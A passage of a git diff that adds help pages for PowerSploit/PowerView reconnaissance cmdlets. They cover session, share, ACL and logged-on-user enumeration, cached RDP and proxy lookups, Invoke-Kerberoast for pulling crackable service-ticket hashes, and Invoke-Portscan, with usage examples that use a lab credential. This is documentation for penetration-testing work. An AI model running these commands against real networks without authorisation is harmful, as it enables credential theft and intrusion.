+## RELATED LINKS
+
+[https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx)
+
diff --git a/docs/Recon/Get-NetSession.md b/docs/Recon/Get-NetSession.md new file mode 100755 index 0000000..d9e2f50 --- /dev/null +++ b/docs/Recon/Get-NetSession.md @@ -0,0 +1,99 @@ +# Get-NetSession
+
+## SYNOPSIS
+Returns session information for the local (or a remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetSessionEnum Win32API call to query
+a given host for active sessions.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetSession
+```
+
+Returns active sessions on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetSession -ComputerName sqlserver
+```
+
+Returns active sessions on the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-NetSession
+```
+
+Returns active sessions on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetSession -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.SessionInfo
+
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the CName/UserName/Time/IdleTime for each session, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
diff --git a/docs/Recon/Get-NetShare.md b/docs/Recon/Get-NetShare.md new file mode 100755 index 0000000..b3f2abe --- /dev/null +++ b/docs/Recon/Get-NetShare.md @@ -0,0 +1,100 @@ +# Get-NetShare
+
+## SYNOPSIS
+Returns open shares on the local (or a remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetShare [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetShareEnum Win32API call to query
+a given host for open shares.
+This is a replacement for "net share \\\\hostname".
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetShare
+```
+
+Returns active shares on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetShare -ComputerName sqlserver
+```
+
+Returns active shares on the 'sqlserver' host
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-NetShare
+```
+
+Returns all shares for all computers in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetShare -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for shares (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ShareInfo
+
+A PSCustomObject representing a SHARE_INFO_1 structure, including
+the name/type/remark for each share, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
diff --git a/docs/Recon/Get-PathAcl.md b/docs/Recon/Get-PathAcl.md new file mode 100755 index 0000000..448212f --- /dev/null +++ b/docs/Recon/Get-PathAcl.md @@ -0,0 +1,94 @@ +# Get-PathAcl
+
+## SYNOPSIS
+Enumerates the ACL for a given file path.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-PathAcl [-Path] <String[]> [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the ACL for a specified file/folder path, and translates
+the access rules for each entry into readable formats.
+If -Credential is passed,
+Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-PathAcl "\\SERVER\Share\"
+```
+
+Returns ACLs for the given UNC share.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+gci .\test.txt | Get-PathAcl
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred
+
+## PARAMETERS
+
+### -Path
+Specifies the local or remote path to enumerate the ACLs for.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: FullName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target path.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+One of more paths to enumerate ACLs for.
+
+## OUTPUTS
+
+### PowerView.FileACL
+
+A custom object with the full path and associated ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)
+
diff --git a/docs/Recon/Get-RegLoggedOn.md b/docs/Recon/Get-RegLoggedOn.md new file mode 100755 index 0000000..2fd6e09 --- /dev/null +++ b/docs/Recon/Get-RegLoggedOn.md @@ -0,0 +1,89 @@ +# Get-RegLoggedOn
+
+## SYNOPSIS
+Returns who is logged onto the local (or a remote) machine
+through enumeration of remote registry keys.
+
+Note: This function requires only domain user rights on the
+machine you're enumerating, but remote registry must be enabled.
+
+Author: Matt Kelly (@BreakersAll)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-RegLoggedOn [[-ComputerName] <String[]>]
+```
+
+## DESCRIPTION
+This function will query the HKU registry values to retrieve the local
+logged on users SID and then attempt and reverse it.
+Adapted technique from Sysinternal's PSLoggedOn script.
+Benefit over
+using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
+required (NetWkstaUserEnum requires remote admin access).
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-RegLoggedOn
+```
+
+Returns users actively logged onto the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-RegLoggedOn -ComputerName sqlserver
+```
+
+Returns users actively logged onto the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-RegLoggedOn
+```
+
+Returns users actively logged on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RegLoggedOnUser
+
+A PSCustomObject including the UserDomain/UserName/UserSID of each
+actively logged on user, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIProcess.md b/docs/Recon/Get-WMIProcess.md new file mode 100755 index 0000000..481dbb6 --- /dev/null +++ b/docs/Recon/Get-WMIProcess.md @@ -0,0 +1,80 @@ +# Get-WMIProcess
+
+## SYNOPSIS
+Returns a list of processes and their owners on the local or remote machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIProcess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
+including the owners of the particular process.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIProcess -ComputerName WINDOWS1
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserProcess
+
+A PSCustomObject containing the remote process information.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIRegCachedRDPConnection.md b/docs/Recon/Get-WMIRegCachedRDPConnection.md new file mode 100755 index 0000000..fe60228 --- /dev/null +++ b/docs/Recon/Get-WMIRegCachedRDPConnection.md @@ -0,0 +1,99 @@ +# Get-WMIRegCachedRDPConnection
+
+## SYNOPSIS
+Returns information about RDP connections outgoing from the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-WMIRegCachedRDPConnection [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses remote registry functionality to query all entries for the
+"Windows Remote Desktop Connection Client" on a machine, separated by
+user and target server.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegCachedRDPConnection
+```
+
+Returns the RDP connection client information for the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local
+```
+
+Returns the RDP connection client information for the WINDOWS2.testlab.local machine
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegCachedRDPConnection
+```
+
+Returns cached RDP information for all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.CachedRDPConnection
+
+A PSCustomObject containing the ComputerName and cached RDP information.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIRegLastLoggedOn.md b/docs/Recon/Get-WMIRegLastLoggedOn.md new file mode 100755 index 0000000..bed39e0 --- /dev/null +++ b/docs/Recon/Get-WMIRegLastLoggedOn.md @@ -0,0 +1,98 @@ +# Get-WMIRegLastLoggedOn
+
+## SYNOPSIS
+Returns the last user who logged onto the local (or a remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIRegLastLoggedOn [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function uses remote registry to enumerate the LastLoggedOnUser registry key
+for the local (or remote) machine.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegLastLoggedOn
+```
+
+Returns the last user logged onto the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
+```
+
+Returns the last user logged onto WINDOWS1
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegLastLoggedOn
+```
+
+Returns the last user logged onto all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LastLoggedOnUser
+
+A PSCustomObject containing the ComputerName and last loggedon user.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIRegMountedDrive.md b/docs/Recon/Get-WMIRegMountedDrive.md new file mode 100755 index 0000000..353bcf0 --- /dev/null +++ b/docs/Recon/Get-WMIRegMountedDrive.md @@ -0,0 +1,97 @@ +# Get-WMIRegMountedDrive
+
+## SYNOPSIS
+Returns information about saved network mounted drives for the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-WMIRegMountedDrive [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses remote registry functionality to enumerate recently mounted network drives.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegMountedDrive
+```
+
+Returns the saved network mounted drives for the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
+```
+
+Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegMountedDrive
+```
+
+Returns the saved network mounted drives for all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for mounted drive information (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RegMountedDrive
+
+A PSCustomObject containing the ComputerName and mounted drive information.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-WMIRegProxy.md b/docs/Recon/Get-WMIRegProxy.md new file mode 100755 index 0000000..b5fe966 --- /dev/null +++ b/docs/Recon/Get-WMIRegProxy.md @@ -0,0 +1,93 @@ +# Get-WMIRegProxy
+
+## SYNOPSIS
+Enumerates the proxy server and WPAD conents for the current user.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIRegProxy [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the proxy server and WPAD specification for the current user
+on the local machine (default), or a machine specified with -ComputerName.
+It does this by enumerating settings from
+HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegProxy
+```
+
+ComputerName ProxyServer AutoConfigURL Wpad
+------------ ----------- ------------- ----
+WINDOWS1 http://primary.test...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Cred = Get-Credential "TESTLAB\administrator"
+```
+
+Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
+
+ComputerName ProxyServer AutoConfigURL Wpad
+------------ ----------- ------------- ----
+windows1.testlab.local primary.testlab.local
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to enumerate proxy settings on.
+Defaults to the local host.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more computer name specification strings on the pipeline (netbios or FQDN).
+
+## OUTPUTS
+
+### PowerView.ProxySettings
+
+Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Invoke-Kerberoast.md b/docs/Recon/Invoke-Kerberoast.md new file mode 100755 index 0000000..edfb89b --- /dev/null +++ b/docs/Recon/Invoke-Kerberoast.md @@ -0,0 +1,233 @@ +# Invoke-Kerberoast
+
+## SYNOPSIS
+Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.
+
+Author: Will Schroeder (@harmj0y), @machosec
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket
+
+## SYNTAX
+
+```
+Invoke-Kerberoast [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainUser to query for user accounts with non-null service principle
+names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
+The ticket format can be specified with -OutputFormat \<John/Hashcat\>.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-Kerberoast | fl
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-Kerberoast -Domain dev.testlab.local | fl
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword)
+Invoke-Kerberoast -Credential $Cred -Verbose | fl
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OutputFormat
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Format
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Invoke-Portscan.md b/docs/Recon/Invoke-Portscan.md new file mode 100755 index 0000000..8e1ef27 --- /dev/null +++ b/docs/Recon/Invoke-Portscan.md @@ -0,0 +1,430 @@ +# Invoke-Portscan
+
+## SYNOPSIS
+Simple portscan module
+
+PowerSploit Function: Invoke-Portscan
+Author: Rich Lundeen (http://webstersProdigy.net)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### cmdHosts
+```
+Invoke-Portscan -Hosts <String[]> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]
+ [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]
+ [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]
+ [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]
+ [-quiet] [-ForceOverwrite]
+```
+
+### fHosts
+```
+Invoke-Portscan -HostFile <String> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]
+ [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]
+ [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]
+ [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]
+ [-quiet] [-ForceOverwrite]
+```
+
+## DESCRIPTION
+Does a simple port scan using regular sockets, based (pretty) loosely on nmap
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50
+```
+
+Description
+-----------
+Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
+```
+
+Description
+-----------
+Does a portscan of "webstersprodigy.net", and writes a greppable output file
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet
+```
+
+Description
+-----------
+Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats
+
+## PARAMETERS
+
+### -Hosts
+Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in
+
+```yaml
+Type: String[]
+Parameter Sets: cmdHosts
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -HostFile
+Input hosts from file rather than commandline
+
+```yaml
+Type: String
+Parameter Sets: fHosts
+Aliases: iL
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeHosts
+Exclude these comma seperated hosts
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: exclude
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Ports
+Include these comma seperated ports (can also be a range like 80-90)
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: p
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PortFile
+Input ports from a file
+
+```yaml
+Type: String
